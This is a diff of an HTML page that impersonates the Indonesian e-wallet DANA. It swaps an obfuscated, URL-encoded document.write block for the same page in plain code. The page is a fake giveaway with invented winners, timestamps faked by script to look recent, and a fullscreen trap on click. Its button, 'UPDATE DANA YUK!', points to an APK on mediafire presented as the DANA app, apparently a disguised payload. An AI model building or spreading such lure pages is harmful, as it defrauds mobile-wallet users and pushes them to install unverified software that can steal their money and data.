--- a/danaid.html
+++ b/danaid.html
@@ -1,5 +1,131 @@
+<!DOCTYPE html><title>Yah!.. Kamu Terlambat</title><link href="https://a.m.dana.id/merchant-portal/app/assets/fav-icon.png" rel="icon" type="image/png"><meta charset=UTF-8><meta content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" name=viewport><style>@import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&display=swap');
+ * {
+     font-family: 'Open Sans', sans-serif;
+     font-weight: 400;
+ }
+ body {
+     width: 100%;
+     height: 100vh;
+     margin: 0;
+     display: flex;
+     justify-content: center;
+     background: linear-gradient(to top right, #1084DA, #06B4FF);
+     overflow: scroll;
+ }
+ .container {
+     box-sizing: border-box;
+     width: 100%;
+     max-height: 1500px;
+     max-width: 600px;
+     display: flex;
+     flex-direction: column;
+     position: absolute;
+ }
+ .head {
+     position: fixed;
+     display: flex;
+     justify-content: left;
+     align-items: center;
+     height: 60px;
+     width: 100%;
+     max-width: 600px;
+     top: 0;
+     background: #1089E1;
+     z-index: 1;
+ }
+ h2 {
+     padding-left: 20px;
+     font-size: 17px;
+     font-weight: 600;
+     color: #ffffff;
+ }
+ .back {
+     width: 18px;
+     margin-left: 18px;
+ }
+ .late {
+     margin-top: 10px;
+ }
+ .winner {
+     height: 100%;
+     width: 100%;
+     background: #ebebeb;
+     display: flex;
+     flex-direction: column;
+ }
+ .banner_end {
+     margin-top: 60px;
+     width: 100%;
+ }
+ .win {
+     box-sizing: border-box;
+     width: 100%;
+     height: 30px;
+     background: #eee;
+     font-size: 13px;
+     font-weight: 600;
+     color: #0000006b;
+     display: flex;
+     align-items: center;
+     text-align: left;
+     padding: auto;
+     padding-left: 20px;
+ }
+ .profil {
+     box-sizing: border-box;
+     padding-left: 15px;
+     margin-top: 1px;
+     width: 100%;
+     height: 60px;
+     background: #ffffff;
+ }
+ .null {
+     border-radius: 50%;
+     width: 40px;
+     margin-top: 10px;
+ }
+ .name {
+     font-size: 15px;
+     position: absolute;
+     margin-left: 70px;
+     margin-top: 12px;
+     color: black;
+ }
+ .dte {
+     font-size: 11px;
+     position: absolute;
+     margin-left: 70px;
+     margin-top: 33px;
+     color: #bdbdbd;
+ }
+ .rp {
+     margin-top: 18px;
+     margin-right: 13px;
+     float: right;
+ }
+ .buton {
+     box-sizing: border-box;
+     padding: 20px;
+     margin-top: 1px;
+     width: 100%;
+     height: 90px;
+     background: #ffffff;
+     justify-content: center;
+ }
+ button {
+     width: 100%;
+     height: 90%;
+     font-size: 18px;
+     color: #fff;
+     background: #108ee9;
+     border-radius: 5px;
+     border: 1.5px solid #108ee9;
+}</style><div class=container><div class=head><a href=kaget.github.io/index.html class=aback><img class=back src=https://yongkru.skemabiayatarif.com/DANA/assets/img/back.png></a><h2 class=late>Kamu terlambat!</h2></div><dic class=winner><img class=banner_end src=https://yongkru.skemabiayatarif.com/DANA/assets/img/end.jpg><div class=win>PEMENANG</div><div class=profil><p class=name>NANANG SAPUTRA<p class=dte id=tgl><p class=rp>Rp1.050.056</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/1.jpg></div><div class=profil><p class=name>ASYRAFI FAUZIYAH<p class=dte id=tgl><p class=rp>Rp890.173</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/2.jpg></div><div class=profil><p class=name>LUKMAN RAMADHAN<p class=dte id=tgl><p class=rp>Rp587.230</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>081*****4726<p class=dte id=tgl><p class=rp>Rp585.300</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/3.jpg></div><div class=profil><p class=name>RIMA MEUTIA<p class=dte id=tgl><p class=rp>Rp385.000</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>CHAERUL MELINDA<p class=dte id=tgl><p class=rp>Rp280.380</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/4.jpg></div><div class=profil><p class=name>RENA ALFHARIZQI<p class=dte id=tgl><p class=rp>Rp75.378</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/5.jpg></div><div class=profil><p class=name>089****8173<p class=dte id=tgl><p class=rp>Rp50.987</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>085*****8172<p class=dte id=tgl><p class=rp>Rp44.189</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>ZELAYA PRADIPTA<p class=dte id=tgl><p class=rp>Rp30.000</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>RIZQI RIFAI<p class=dte id=tgl><p class=rp>Rp28.863</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>SAKURA MEGANTARA<p class=dte id=tgl><p class=rp>Rp28.103</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>081*****8277<p class=dte id=tgl><p class=rp>Rp25.547</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>RISMA AULIA<p class=dte id=tgl><p class=rp>Rp20.827</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/6.jpg></div><div class=profil><p class=name>SAFITRI<p class=dte id=tgl><p class=rp>Rp16.673</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=profil><p class=name>FATHUS SALIM<p class=dte id=tgl><p class=rp>Rp10.047</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/7.jpg></div><div class=profil><p class=name>088*****7927<p class=dte id=tgl><p class=rp>Rp9.872</p><img class=null src=https://yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png></div><div class=buton><a href=https://download1493.mediafire.com/toqzu55fnvogaM9bbU2kHzfkjyWKYbsY6YJ6BuijaLruHGpga-MN1J-oQ9Z87LKafK-axi_-76hCslpwAxucc9xyzg2Cws4/sa4lcqbrej3czr6/DANA%E2%80%93Dompet+Digital+Indonesia.apk ><button>UPDATE DANA YUK!</button></a></div></dic></div><script>const date=new Date;let dy=date.getDate(),day=(dy<10?"0":"")+dy,year=date.getFullYear(),hour=date.getHours(),hours=(hour<10?"0":"")+hour,minute=date.getMinutes()-1,minutes=minute.toString().replace(/-/g,""),menit=(minutes<10?"0":"")+minutes,currentDate=`${day} Nov ${year} - ${hours}:${menit}`;xx=document.getElementsByClassName("dte");for(var i=0;i<xx.length;i++)xx[i].innerHTML=currentDate</script>
 <script>
-<!--
-document.write(unescape("%3C%21DOCTYPE%20html%3E%3Ctitle%3EYah%21..%20Kamu%20Terlambat%3C/title%3E%3Clink%20href%3D%22https%3A//a.m.dana.id/merchant-portal/app/assets/fav-icon.png%22%20rel%3D%22icon%22%20type%3D%22image/png%22%3E%3Cmeta%20charset%3DUTF-8%3E%3Cmeta%20content%3D%22width%3Ddevice-width%2Cinitial-scale%3D1%2Cmaximum-scale%3D1%2Cuser-scalable%3Dno%22%20name%3Dviewport%3E%3Cstyle%3E@import%20url%28%27https%3A//fonts.googleapis.com/css2%3Ffamily%3DOpen+Sans%3Awght@400%3B600%3B700%26display%3Dswap%27%29%3B%0A%20*%20%7B%0A%20%20%20%20%20font-family%3A%20%27Open%20Sans%27%2C%20sans-serif%3B%0A%20%20%20%20%20font-weight%3A%20400%3B%0A%20%7D%0A%20body%20%7B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20height%3A%20100vh%3B%0A%20%20%20%20%20margin%3A%200%3B%0A%20%20%20%20%20display%3A%20flex%3B%0A%20%20%20%20%20justify-content%3A%20center%3B%0A%20%20%20%20%20background%3A%20linear-gradient%28to%20top%20right%2C%20%231084DA%2C%20%2306B4FF%29%3B%0A%20%20%20%20%20overflow%3A%20scroll%3B%0A%20%7D%0A%20.container%20%7B%0A%20%20%20%20%20box-sizing%3A%20border-box%3B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20max-height%3A%201500px%3B%0A%20%20%20%20%20max-width%3A%20600px%3B%0A%20%20%20%20%20display%3A%20flex%3B%0A%20%20%20%20%20flex-direction%3A%20column%3B%0A%20%20%20%20%20position%3A%20absolute%3B%0A%20%7D%0A%20.head%20%7B%0A%20%20%20%20%20position%3A%20fixed%3B%0A%20%20%20%20%20display%3A%20flex%3B%0A%20%20%20%20%20justify-content%3A%20left%3B%0A%20%20%20%20%20align-items%3A%20center%3B%0A%20%20%20%20%20height%3A%2060px%3B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20max-width%3A%20600px%3B%0A%20%20%20%20%20top%3A%200%3B%0A%20%20%20%20%20background%3A%20%231089E1%3B%0A%20%20%20%20%20z-index%3A%201%3B%0A%20%7D%0A%20h2%20%7B%0A%20%20%20%20%20padding-left%3A%2020px%3B%0A%20%20%20%20%20font-size%3A%2017px%3B%0A%20%20%20%20%20font-weight%3A%20600%3B%0A%20%20%20%20%20color%3A%20%23ffffff%3B%0A%20%7D%0A%20.back%20%7B%0A%20%20%20%20%20width%3A%2018px%3B%0A%20%20%20%20%20margin-left%3A%2018px%3B%0A%20%7D%0A%20.late%20%7B%0A%20%20%20%20%20margin-top%3A%2010px%3B%0A%20%7D%0A%20.winner%20%7B%0A%20%20%20%20%20height%3A%20100%25%3B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20background%3A%20%23ebebeb%3B%0A%20%20%20%20%20display%3A%20flex%3B%0A%20%20%20%20%20flex-direction%3A%20column%3B%0A%20%7D%0A%20.banner_end%20%7B%0A%20%20%20%20%20margin-top%3A%2060px%3B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%7D%0A%20.win%20%7B%0A%20%20%20%20%20box-sizing%3A%20border-box%3B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20height%3A%2030px%3B%0A%20%20%20%20%20background%3A%20%23eee%3B%0A%20%20%20%20%20font-size%3A%2013px%3B%0A%20%20%20%20%20font-weight%3A%20600%3B%0A%20%20%20%20%20color%3A%20%230000006b%3B%0A%20%20%20%20%20display%3A%20flex%3B%0A%20%20%20%20%20align-items%3A%20center%3B%0A%20%20%20%20%20text-align%3A%20left%3B%0A%20%20%20%20%20padding%3A%20auto%3B%0A%20%20%20%20%20padding-left%3A%2020px%3B%0A%20%7D%0A%20.profil%20%7B%0A%20%20%20%20%20box-sizing%3A%20border-box%3B%0A%20%20%20%20%20padding-left%3A%2015px%3B%0A%20%20%20%20%20margin-top%3A%201px%3B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20height%3A%2060px%3B%0A%20%20%20%20%20background%3A%20%23ffffff%3B%0A%20%7D%0A%20.null%20%7B%0A%20%20%20%20%20border-radius%3A%2050%25%3B%0A%20%20%20%20%20width%3A%2040px%3B%0A%20%20%20%20%20margin-top%3A%2010px%3B%0A%20%7D%0A%20.name%20%7B%0A%20%20%20%20%20font-size%3A%2015px%3B%0A%20%20%20%20%20position%3A%20absolute%3B%0A%20%20%20%20%20margin-left%3A%2070px%3B%0A%20%20%20%20%20margin-top%3A%2012px%3B%0A%20%20%20%20%20color%3A%20black%3B%0A%20%7D%0A%20.dte%20%7B%0A%20%20%20%20%20font-size%3A%2011px%3B%0A%20%20%20%20%20position%3A%20absolute%3B%0A%20%20%20%20%20margin-left%3A%2070px%3B%0A%20%20%20%20%20margin-top%3A%2033px%3B%0A%20%20%20%20%20color%3A%20%23bdbdbd%3B%0A%20%7D%0A%20.rp%20%7B%0A%20%20%20%20%20margin-top%3A%2018px%3B%0A%20%20%20%20%20margin-right%3A%2013px%3B%0A%20%20%20%20%20float%3A%20right%3B%0A%20%7D%0A%20.buton%20%7B%0A%20%20%20%20%20box-sizing%3A%20border-box%3B%0A%20%20%20%20%20padding%3A%2020px%3B%0A%20%20%20%20%20margin-top%3A%201px%3B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20height%3A%2090px%3B%0A%20%20%20%20%20background%3A%20%23ffffff%3B%0A%20%20%20%20%20justify-content%3A%20center%3B%0A%20%7D%0A%20button%20%7B%0A%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20height%3A%2090%25%3B%0A%20%20%20%20%20font-size%3A%2018px%3B%0A%20%20%20%20%20color%3A%20%23fff%3B%0A%20%20%20%20%20background%3A%20%23108ee9%3B%0A%20%20%20%20%20border-radius%3A%205px%3B%0A%20%20%20%20%20border%3A%201.5px%20solid%20%23108ee9%3B%0A%7D%3C/style%3E%3Cdiv%20class%3Dcontainer%3E%3Cdiv%20class%3Dhead%3E%3Ca%20href%3Dkaget.github.io/index.html%20class%3Daback%3E%3Cimg%20class%3Dback%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/back.png%3E%3C/a%3E%3Ch2%20class%3Dlate%3EKamu%20terlambat%21%3C/h2%3E%3C/div%3E%3Cdic%20class%3Dwinner%3E%3Cimg%20class%3Dbanner_end%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/end.jpg%3E%3Cdiv%20class%3Dwin%3EPEMENANG%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ENANANG%20SAPUTRA%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp1.050.056%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/1.jpg%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3EASYRAFI%20FAUZIYAH%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp890.173%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/2.jpg%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ELUKMAN%20RAMADHAN%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp587.230%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3E081*****4726%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp585.300%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/3.jpg%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ERIMA%20MEUTIA%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp385.000%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ECHAERUL%20MELINDA%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp280.380%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/4.jpg%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ERENA%20ALFHARIZQI%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp75.378%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/5.jpg%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3E089****8173%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp50.987%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3E085*****8172%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp44.189%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3EZELAYA%20PRADIPTA%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp30.000%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ERIZQI%20RIFAI%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp28.863%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ESAKURA%20MEGANTARA%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp28.103%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3E081*****8277%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp25.547%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ERISMA%20AULIA%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp20.827%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/6.jpg%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3ESAFITRI%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp16.673%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3EFATHUS%20SALIM%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp10.047%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/7.jpg%3E%3C/div%3E%3Cdiv%20class%3Dprofil%3E%3Cp%20class%3Dname%3E088*****7927%3Cp%20class%3Ddte%20id%3Dtgl%3E%3Cp%20class%3Drp%3ERp9.872%3C/p%3E%3Cimg%20class%3Dnull%20src%3Dhttps%3A//yongkru.skemabiayatarif.com/DANA/assets/img/pict/0.png%3E%3C/div%3E%3Cdiv%20class%3Dbuton%3E%3Ca%20href%3Dhttps%3A//download1493.mediafire.com/toqzu55fnvogaM9bbU2kHzfkjyWKYbsY6YJ6BuijaLruHGpga-MN1J-oQ9Z87LKafK-axi_-76hCslpwAxucc9xyzg2Cws4/sa4lcqbrej3czr6/DANA%25E2%2580%2593Dompet+Digital+Indonesia.apk%20%3E%3Cbutton%3EUPDATE%20DANA%20YUK%21%3C/button%3E%3C/a%3E%3C/div%3E%3C/dic%3E%3C/div%3E%3Cscript%3Econst%20date%3Dnew%20Date%3Blet%20dy%3Ddate.getDate%28%29%2Cday%3D%28dy%3C10%3F%220%22%3A%22%22%29+dy%2Cyear%3Ddate.getFullYear%28%29%2Chour%3Ddate.getHours%28%29%2Chours%3D%28hour%3C10%3F%220%22%3A%22%22%29+hour%2Cminute%3Ddate.getMinutes%28%29-1%2Cminutes%3Dminute.toString%28%29.replace%28/-/g%2C%22%22%29%2Cmenit%3D%28minutes%3C10%3F%220%22%3A%22%22%29+minutes%2CcurrentDate%3D%60%24%7Bday%7D%20Nov%20%24%7Byear%7D%20-%20%24%7Bhours%7D%3A%24%7Bmenit%7D%60%3Bxx%3Ddocument.getElementsByClassName%28%22dte%22%29%3Bfor%28var%20i%3D0%3Bi%3Cxx.length%3Bi++%29xx%5Bi%5D.innerHTML%3DcurrentDate%3C/script%3E%0A%3Cscript%3E%0Adocument.documentElement.addEventListener%28%22click%22%2C%20function%20%28%29%7B%0A%20%20%20%20var%20docElm%20%3D%20document.documentElement%3B%0A%20%20%20%20if%20%28docElm.requestFullscreen%29%20%7BdocElm.requestFullscreen%28%29%7D%0A%20%20%20%20else%20if%20%28docElm.mozRequestFullScreen%29%20%7BdocElm.mozRequestFullScreen%28%29%7D%0A%20%20%20%20else%20if%20%28docElm.webkitRequestFullScreen%29%20%7BdocElm.webkitRequestFullScreen%28%29%7D%0A%7D%29%3B%0A%3C/script%3E"));
-//-->
+document.documentElement.addEventListener("click", function (){
+    var docElm = document.documentElement;
+    if (docElm.requestFullscreen) {docElm.requestFullscreen()}
+    else if (docElm.mozRequestFullScreen) {docElm.mozRequestFullScreen()}
+    else if (docElm.webkitRequestFullScreen) {docElm.webkitRequestFullScreen()}
+});
 </script>
